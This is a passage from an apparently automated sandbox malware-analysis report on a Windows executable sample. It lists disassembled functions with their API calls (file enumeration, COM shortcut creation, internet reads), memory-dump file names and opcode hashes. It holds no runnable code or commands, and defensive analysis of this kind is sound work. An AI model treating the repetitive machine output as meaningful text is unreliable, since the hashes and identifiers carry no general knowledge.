                                                                                                                                                                                                                                                                                                                                                                                                                                • IsIconic.USER32 ref: 0047A393
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044CF17 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 409COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4104443479-2967466578
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 805adc2059bf501b1fa7be94bd771afe84ede2009410d8cfdb1e23709f1c8037
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c9675114c6ec2fd72297f2377e71b357c10be6b45234191c4e6a35d7edb1fe2e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 805adc2059bf501b1fa7be94bd771afe84ede2009410d8cfdb1e23709f1c8037
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1BF1A470D006498FEF24CFA9C4802AEFBF2FF85314F2882AAD455AB345D375A946CB55
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 48322524-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00442E0C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __time64.LIBCMT ref: 00442E1E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004148B3: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00430E3E,00000000,?,?,00441E36,?,00000001), ref: 004148BE
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004148B3: __aulldiv.LIBCMT ref: 004148DE
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @uJ
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2893107130-1268412911
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f8baac42c5f25f74c7dd853c159356035b8e1d829a17ed988ba9b2caf3e3cd55
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d38707ff02ce459d0d249ce09c4ef886a5fe37698b82f7f0427e65daa233e585
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8baac42c5f25f74c7dd853c159356035b8e1d829a17ed988ba9b2caf3e3cd55
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB21A2335605108BF320CF37CC01652B7E7EBE5310F358A69E4A5973D1DAB96906CB98
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                                                                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 901099227-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045DE8F Relevance: 3.1, APIs: 2, Instructions: 55fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DEB4
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0045DEF0
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fa8284a9ded648ffea22647615070995beef9130508a8479dbfd4b77e5f7619d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 87eaadf29b8e191e1ea341be1384c57ecbaef0316c3fc1e5a02930af3baeb018
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa8284a9ded648ffea22647615070995beef9130508a8479dbfd4b77e5f7619d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C11E5726002049FD310EF6ADC49A5AF7E9FF84325F10C92EF998DB281DB74E8448B94
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044AF6C Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,00000001,?,00451C81,?,00000001,?), ref: 0044AF9D
                                                                                                                                                                                                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,00000001,?,00451C81,?,00000001,?), ref: 0044AFB6
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7201a099929c13ddf9d8c4ed88e1fa575203edf34e49f70b38f45227ddf022c1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 34579116b05a7082732a3a1f7365c6d8fd3edd81a632b3ed1e6c87f0e426309d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7201a099929c13ddf9d8c4ed88e1fa575203edf34e49f70b38f45227ddf022c1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57F0B4712503186AFB24AB58DC49FBAB36CEF44711F0046AAF504971D1D6F07D40C7A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Proc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2346855178-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
